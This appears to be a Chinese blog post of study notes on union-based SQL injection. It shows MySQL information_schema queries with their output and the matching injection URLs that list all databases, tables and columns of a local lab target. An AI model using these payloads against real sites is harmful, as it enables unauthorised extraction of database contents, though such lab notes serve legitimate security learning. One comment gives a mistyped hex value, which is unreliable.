sql注入学习小结

Posted 2020-08-19 可我浪费着我寒冷的年华

/*

转载请注明出处,By:珍惜少年时

小知识，只是放在博客吃饭时无聊看看，大牛勿喷。

*/

珍惜少年时博客,专注网络安全 web渗透测试

---

00x1爆所有库：

mysql> select schema_name from information_schema.schemata;
+--------------------+
| schema_name        |
+--------------------+
| information_schema |
| challenges         |
| dvwa               |
| mysql              |
| performance_schema |
| phpcmsv9           |
| security           |
| sqlinject          |
| test               |
| test_sqlinjection  |
+--------------------+
10 rows in set (0.00 sec)

#该命令等价于show databases；
#所以sql语句为：
http://127.0.0.1/sqlinjection.php?id=-5 union select 1,2,group_concat(schema_name) from information_schema.schemata--

---

00x2爆所有表：

mysql> select group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374;
+--------------------------+
| group_concat(table_name) |
+--------------------------+
| admin,user,user_a        |
+--------------------------+
1 row in set (0.00 sec)

#注：
0x91916c696E6a656374为sqlinject库的16进制　
#该命令等价于show tables;当然了，是在选择了数据库的情况下，也就是where哪里使用hex选择了的。
#所以sql语句为：
http://127.0.0.1/sqlinjection.php?id=-5 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374--

#可将其缩句为：select table_name from information_schema.tables

该sql语句可不选择数据库，直接爆所有的表。“列名”亦是如此。

---

00x3爆所有列：

mysql> select group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374;
+----------------------------------------------------------------+
| group_concat(column_name)                                      |
+----------------------------------------------------------------+
| id,username,password,id,username,password,id,username,password |
+----------------------------------------------------------------+
1 row in set (0.03 sec)

故语句为：
http://127.0.0.1/sqlinjection.php?id=-5 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374--